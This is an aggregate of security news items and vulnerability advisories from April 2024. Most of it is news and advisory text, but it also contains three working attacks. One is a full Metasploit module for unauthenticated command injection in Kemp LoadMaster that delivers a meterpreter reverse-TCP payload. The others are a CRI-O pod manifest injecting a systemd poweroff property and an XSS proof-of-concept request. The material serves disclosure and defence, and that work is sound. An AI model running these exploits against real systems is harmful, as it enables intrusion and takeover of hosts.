The purported metadata for each these containers had embedded links to malicious files.

Source: Tada Images via Shutterstock

Docker has removed nearly 3 million public repositories from Docker Hub after researchers discovered each one to be imageless and have no content besides an accompanying apparent description page that contained links to malicious content instead.

Researchers from JFrog spotted the threat in a recent investigation and identified the containers as being used in three large-scale campaigns to distribute spam and malware. Docker has since instituted a new mechanism that prevents links to external resources in the description pages of imageless repositories.

**More Moderation Needed?**

"Unlike typical attacks targeting developers and organizations directly, the attackers in this case tried to leverage Docker Hub's platform credibility, making it more difficult to identity the phishing and malware installation attempts," JFrog said in an April 30 report. "Almost 3 million malicious repositories, some of them active for over three years, highlight the attackers' continued misuse of the Docker Hub platform and the need for constant moderation on such platforms."

JFrog found that some 4.6 million imageless repositories were published on Docker Hub over a five-year period. Of that, nearly all of them had associated metadata that was malicious in nature. JFrog researchers counted a total of 208,739 fake accounts that the attackers used to upload the malicious repositories.

According to JFrog, what enabled the threat actors is a Docker policy that allows users to include short text descriptions and metadata in HTML format, along with any container images that they publish to Docker Hub. The purpose in allowing these descriptions is to enable users to search for and find images on the cloud-based registry service that they might find useful for their projects. The feature allowed threat actors to upload imageless containers and to relatively easily include description pages that had embedded links to spam, phishing, and malware sites.

The mass uploads happened in two distinct waves — one in 2021 and the other in 2023. JFrog researchers were able to tie many of the 2021 repository uploads to a campaign to get users to download pirated content and cheats for video games. Most of the URLs in the campaign resolved to sites for malicious file downloads. If a server hosting malicious files was shut down or became otherwise unavailable, the links resolved to a different active server. Another mass upload in 2021 involved a free e-book phishing campaign that appeared designed to steal credit card information.

The 2023 uploads to Docker Hub were a repeat of the 2021 campaign involving pirated content and video game cheats. But instead of the repositories directly pointing to malicious sources, JFrog found them pointing to legitimate resources that quickly redirected victims to a malicious source. One page on blogger.com, for instance, took all of 500 milliseconds to redirect visitors to the malicious payload.

JFrog also uncovered a third campaign that involved a threat actor uploading 1,000 repositories to Docker Hub daily for three years. While the content in the associated documentation appeared harmless, the motive was clearly malicious, JFrog said. The company surmised the threat actor might have been carrying out some kind of a stress testing before launching a malicious campaign.

**Taking Advantage of a Policy Loophole**

Brian Moussalli, malware research team leader at JFrog, says the threat actors were able to carry out the attacks due to the lack of a policy in place that could have prevented it. "After we disclosed the attacks to Docker Hub, they implemented a protection mechanism that blocks embedding links to external resources in the description pages of imageless repositories," he says.

It's hard to tell how effective the malicious campaigns really were, Moussalli says. But it's likely the attackers used a legitimate site like Docker Hub to host pages containing links to malicious files, so users searching for pirated content, video game cheats, and free e-books wouldn't get suspicious. "Another option could be that they used Docker Hub for legitimacy but spread the links to those pages via direct messages to victims," Moussalli says. "Unfortunately, we're unable to determine how exactly victims were manipulated into clicking those links."

Docker can make things harder for threat actors by implementing restriction on mass creation of accounts, alongside enforcing new rules on repository creation, he says. For example, it could prohibit creation of imageless repositories or not allow new users to embed external links for some time after creation of the account or the repository.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Attackers Planted Millions of Imageless Repositories on Docker Hub

## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2m57-hf25-phgg. This link is maintained to preserve external references.

## Original Description
Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-62qf-jcq8-8gxw

**Duplicate Advisory: sqlparse parsing heavily nested list leads to Denial of Service**

High severity GitHub Reviewed Published Apr 30, 2024 to the GitHub Advisory Database • Updated May 1, 2024

Withdrawn This advisory was withdrawn on May 1, 2024

**Package**

pip sqlparse (pip)

**Affected versions**

< 0.5.0

**Description**

Published by the National Vulnerability Database

Apr 30, 2024

Published to the GitHub Advisory Database

Apr 30, 2024

GHSA-62qf-jcq8-8gxw: Duplicate Advisory: sqlparse parsing heavily nested list leads to Denial of Service

The FBI sent out a warning about fraudsters that trick victims into signing up for an expensive verification process on dating sites

The FBI has warned of fraudsters targeting users of dating websites and apps with “free” online verification service schemes that turn out to be very costly.

Instead of being free, as advertised, the verification schemes involve steep monthly subscription fees, and will steal personal information on the side.

The scammers collect the information entered by victims at registrations and use it to commit further fraudulent activity such as identity theft or selling the information on the dark web. The stolen information may include email addresses, phone numbers, and even credit card information.

The scam works like this: The scammer initiates contact on a dating website or app, but then quickly asks the victim to move the conversation to a more private, encrypted platform.

Once there, the scammer will recommend a verification link that supposedly provides protection against predators like sex offenders and serial killers. This verification website asks the victim to provide their name, phone number, email address, and credit card number to complete the process.

After completing the registration, the victim is redirected to a shady dating site that charges hefty monthly fees to the victim’s credit card. These charges show up on the credit card statement as a company the victim has never heard of.

The personal information the victim gives the scammers is useful because it allows them to defraud the victims even more. Whether the scammers are the same ones, or others who have bought the information on the dark web makes no difference to the victims.

**Avoid falling victim**

There are some pointers that may help you to fall victim to scammers such as these:

*   Stay on the platform of your choice. If someone contacts you and wants to continue the conversation elsewhere, that should be a red flag. We saw the same when we discussed scams on Airbnb: It is in the scammers’ interest that the fraud takes place on a platform under their control, where they can’t be as easily tracked.
*   Don’t click on links, downloads or attachments sent to you by strangers. Even if you have been in contact with someone for some time on the internet, they are still strangers. Sometimes they will get to the point fast, but in pig butchering scams for example, the contact can be ongoing for quite a while.
*   If you are contacted by someone and they come across as untrustworthy or suspicious, report them to the platform’s administrators. You may prevent others from falling victim to the scammers.
*   Don’t provide someone you have just met with personal details and information.
*   Monitor your credit card statements and bank accounts for irregularities and contact your bank if you see payments you don’t recognise.
*   Avoid websites that use scare tactics to trick you into registering for a service. At least do a background check to find out if they are legitimate and live up to their promises.
*   Consider identity monitoring. This alerts you if your personal information is found being traded illegally online, and helps you recover after.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 FBI warns online daters to avoid &#8220;free&#8221; online verification schemes that prove costly 

### Impact
On CRI-O, an arbitrary systemd property can be injected via a Pod annotation:
```
---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
    - name: hello
      image: [quay.io/podman/hello](http://quay.io/podman/hello)
```

This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.

Tested with CRI-O v1.24 on minikube.

Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
https://github.com/opencontainers/runc/pull/3923#discussion_r1532292536

CRI-O has to filter out annotations that have the prefix "org.systend.property."

See also:
- https://github.com/opencontainers/runtime-spec/blob/main/features.md#unsafe-annotations-in-configjson
- https://github.com/opencontainers/runc/pull/4217


### Workarounds
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-3154

**CRI-O vulnerable to an arbitrary systemd property injection**

High severity GitHub Reviewed Published Apr 29, 2024 in cri-o/cri-o • Updated Apr 30, 2024

**Package**

gomod github.com/cri-o/cri-o (Go)

**Affected versions**

\>= 1.29.0, <= 1.29.3

\>= 1.28.0, <= 1.28.5

<= 1.27.5

**Patched versions**

1.29.4

1.28.6

1.27.6

**Description**

Published to the GitHub Advisory Database

Apr 30, 2024

Last updated

Apr 30, 2024

GHSA-2cgq-h8xw-2v5j: CRI-O vulnerable to an arbitrary systemd property injection

PRESS RELEASE

SAN DIEGO, April 29, 2024/PRNewswire/ -- ESET, a global leader in cybersecurity solutions, today announced the launch of two new Managed Detection and Response (MDR) subscription tiers: ESET PROTECT MDR for small and medium businesses (SMBs) and ESET PROTECT MDR Ultimate for enterprises. These offerings are built on the foundation of ESET PROTECT Elite and ESET PROTECT Enterprise, offering businesses of all sizes the most comprehensive, AI-powered threat detection and response capabilities, in combination with expert human analysis and comprehensive threat intelligence.

ESET's MDR offerings are designed to cater to the specific needs of both SMBs and Enterprises. To that end, ESET PROTECT MDR delivers a comprehensive cybersecurity package, offering 24/7/365 superior protection that addresses the most common challenges of small and medium-sized businesses. This includes modern protection for endpoints, email, and cloud applications, vulnerability detection and patching, and managed threat monitoring, hunting, and response. It addresses the cybersecurity talent shortages and ensures compliance with cyber insurance and regulations, offering a remarkable 20-minute average time to detect and respond, a comprehensive MDR dedicated dashboard and regular reporting for complete peace of mind.

For enterprises, ESET PROTECT MDR Ultimate offers continuous proactive protection and enhanced visibility, coupled with customized threat hunting and remote digital forensic incident response assistance. This comprehensive service is designed to support overstretched SOC teams, providing them with 24/7 access to world-class cybersecurity expertise. It ensures enterprises stay one step ahead of all known and emerging threats, effectively closing the cybersecurity skills gap, and facilitating expert consultations for incident management and containment in a fully managed experience.

ESET also sets itself apart with its own telemetry and unique global coverage, leveraging its detections and ESET Research to gather unique data about attacks, a competitive edge not offered by many players in the market.

"With the update of our business offering, we want to make ESET products accessible to customers without the necessary skill set or resources to operate them, but to also empower organizations to navigate the digital landscape confidently, safeguarded by our expertise and continuous, comprehensive coverage," stated Michal Jankech, Vice President of SMB and MSP segment at ESET.

Enhancements to the ESET business portfolio

Additionally, all ESET PROTECT subscription tiers, starting from ESET PROTECT Advanced, are now enhanced with ESET Mobile Threat Defense (EMTD). This new value-added, standalone module extends attack vector coverage to an organization's entire mobile fleet, seamlessly integrating into the ESET PROTECT Platform for efficient management, ensuring comprehensive protection for mobile devices. EMTD also includes a Mobile Device Management (MDM) functionality, with added support for Microsoft Entra ID.

Moreover, ESET Server Security introduces a firewall specifically designed for Windows servers, and Vulnerability & Patch Management, offering manual patch management and a 60-second delay of application process kill.

Finally, ESET LiveGuard Advanced now also offers advanced behavioral reports for our detection and response customers, providing an in-depth look into how our cloud sandboxing technology analyzes suspicious files, offering better visibility and context for security operators like cybersecurity and threat analysts, security engineers, or threat responders.

"This significant launch underscores ESET's unwavering dedication to delivering superior protection and services, effectively responding to the dynamic challenges faced by customers to stay one step ahead of threats," added Michal Jankech, Vice President of SMB and MSP segment at ESET.

For more detailed information about ESET and its updated portfolio, please visit the dedicated offering pages for SMBs and Enterprises.

About ESET  
ESET provides cutting-edge digital security to prevent attacks before they happen. By combining the power of AI and human expertise, ESET stays ahead of known and emerging cyber threats — securing businesses, critical infrastructure, and individuals. Whether it's endpoint, cloud or mobile protection, its AI-native, cloud-first solutions and services remain highly effective and easy to use. ESET technology includes robust detection and response, ultra-secure encryption, and multi-factor authentication. With 24/7 real-time defense and strong local support, we keep users safe and businesses running without interruption. An ever-evolving digital landscape demands a progressive approach to security: ESET is committed to world-class research and powerful threat intelligence, backed by R&D centers and a strong global partner network. For more information, visit www.eset.com or follow us on LinkedIn, Facebook, and X.

ESET PROTECT Portfolio Now Includes New MDR Tiers and Features

Okta warns users that the attack requests are made through an anonymizing service like Tor or various commercial proxy networks.

Source: Ahmed Zaggoudi via Alamy Stock Photo

Credential-stuffing attacks targeting online services are spiking due to the accessibility of residential proxy services, stolen credentials, and scripting tools, Okta is warning its users.

From April 19 through April 26, Okta's researchers observed an increase in credential-stuffing attacks against Okta accounts.

Moussa Diallo and Brett Winterford, researchers at Okta Security, note that all recent attacks share a common denominator: The requests are made largely through an anonymizing device such as Tor. 

In addition to this, the researchers found that millions of requests were routed through various residential proxies such as NSOCKS, Luminati, and Datalmpulse. These residential proxies are "networks of legitimate user devices that route traffic on behalf of a paid subscriber." The researchers recently have observed a significant number of mobile devices used in proxy networks where the user has a downloaded app on their device using compromised software developer kits (SDKs).

"Effectively, the developers of these apps have consented to or have been tricked into using an SDK that enrolls the device of any user running the app in a residential proxy network," the researchers wrote. "The net sum of this activity is that most of the traffic in these credential-stuffing attacks appear to originate from the mobile devices and browsers of everyday users."

Okta has released a capability into the Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) that blocks requests from anonymizing services. This feature can be turned on in the settings of the Okta Admin Console. Organizations that want to block access from specific anonymizers must be licensed to use Dynamic Zones, an Adaptive MFA feature.

Okta also recommends that its users shore up best-practice defense measures to prevent account takeovers from credential-stuffing attacks.

"Defense in-depth measures, such as utilizing multifactor authentication on externally available employee access portals as well as sensitive internal systems, are needed here," said Thomas Richards, principal consultant at Synopsys Software Integrity Group, in an emailed statement to Dark Reading. "Additionally, there are anomalous behavior detection systems that can identify if a user is logging in at an unusual time, physical location, or source IP address."

**About the Author(s)**

Okta: Credential-Stuffing Attacks Spike via Proxy Networks

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Kemp LoadMaster in the authorization header after version 7.2.48.1. The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF), and 7.2.48.10 (LTS).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def flag_file    return @flag_file unless @flag_file.nil?    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and          7.2.48.10 (LTS).        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-1212'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']        ],        'DisclosureDate' => '2024-03-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Automatic', # Add logic to run the payload only once            {              'Payload' => {                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",                'Append' => ')',                'BadChars' => "\x3a\x27"              }            }          ],          [            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions            {              'Payload' => {                'BadChars' => "\x3a\x27"              }            }          ]        ],        'Default_target' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',          'FETCH_WRITABLE_DIR' => '/tmp/',          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])    ])  end  def exploit    uri = normalize_uri(target_uri.path, 'access', 'set')    vprint_status('Sending payload...')    send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' =>        {          'param' => 'enableapi',          'value' => '1'        },      'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })  end  def on_new_session(client)    super    print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')  end  def check    print_status("Checking if #{peer} is vulnerable...")    uri = normalize_uri(target_uri.path, 'access', 'set')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' => {        'param' => 'enableapi',        'value' => '1'      },      'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })    # No response from server    unless res      return CheckCode::Unknown    end    # Check for specific error pattern in headers or body to confirm vulnerability    if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')      return CheckCode::Vulnerable    else      return CheckCode::Safe    end  endend

Kemp LoadMaster Unauthenticated Command Injection

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

# Application Name: Doctor Appointment Management System  
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)  
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)  
# BuG: XsS  
# BUG_Author: SoSPiro  
# Version: 1.0  
# CVE: CVE-2024-4293

### Vulnerable code section:

- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`  
- **`Lines 57-61`**

- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`

 ```php  
<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

```  
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

### Vulnerability Description:

- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

### Proof of Concept (PoC)

- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)

- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)

```http

POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

```

- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:

`<script>alert(1)</script>`

- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.

### Impact:

- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

### Reproduce:

- [ -vuldb.com- ](https://vuldb.com/?id.262225)

- [  -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)

- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)

- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)

Doctor Appointment Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2024-2079-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2079.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:2079-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2079Issue date:         2024-04-29Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288,VU#421644.3)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2079-03

Red Hat Security Advisory 2024-1891-03 - Red Hat OpenShift Container Platform release 4.14.22 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include cross site scripting, denial of service, and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1891.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.22 bug fix and security update  
Advisory ID:        RHSA-2024:1891-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1891  
Issue date:         2024-04-28  
Revision:           03  
CVE Names:          CVE-2023-3978  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.22 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.22. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:1897

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)  
* kubevirt-csi: PersistentVolume allows access to HCP's root node  
(CVE-2024-1725)  
* golang.org/x/net/html: Cross site scripting (CVE-2023-3978)  
* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound  
cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-3978

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228689  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://bugzilla.redhat.com/show_bug.cgi?id=2265398  
https://issues.redhat.com/browse/OCPBUGS-25145  
https://issues.redhat.com/browse/OCPBUGS-27108  
https://issues.redhat.com/browse/OCPBUGS-30898  
https://issues.redhat.com/browse/OCPBUGS-31487  
https://issues.redhat.com/browse/OCPBUGS-31504  
https://issues.redhat.com/browse/OCPBUGS-31648  
https://issues.redhat.com/browse/OCPBUGS-31669  
https://issues.redhat.com/browse/OCPBUGS-31677  
https://issues.redhat.com/browse/OCPBUGS-31731  
https://issues.redhat.com/browse/OCPBUGS-31844  
https://issues.redhat.com/browse/OCPBUGS-31862  
https://issues.redhat.com/browse/OCPBUGS-31885  
https://issues.redhat.com/browse/OCPBUGS-31886  
https://issues.redhat.com/browse/OCPBUGS-32112  
https://issues.redhat.com/browse/OCPBUGS-32137

Tag

#git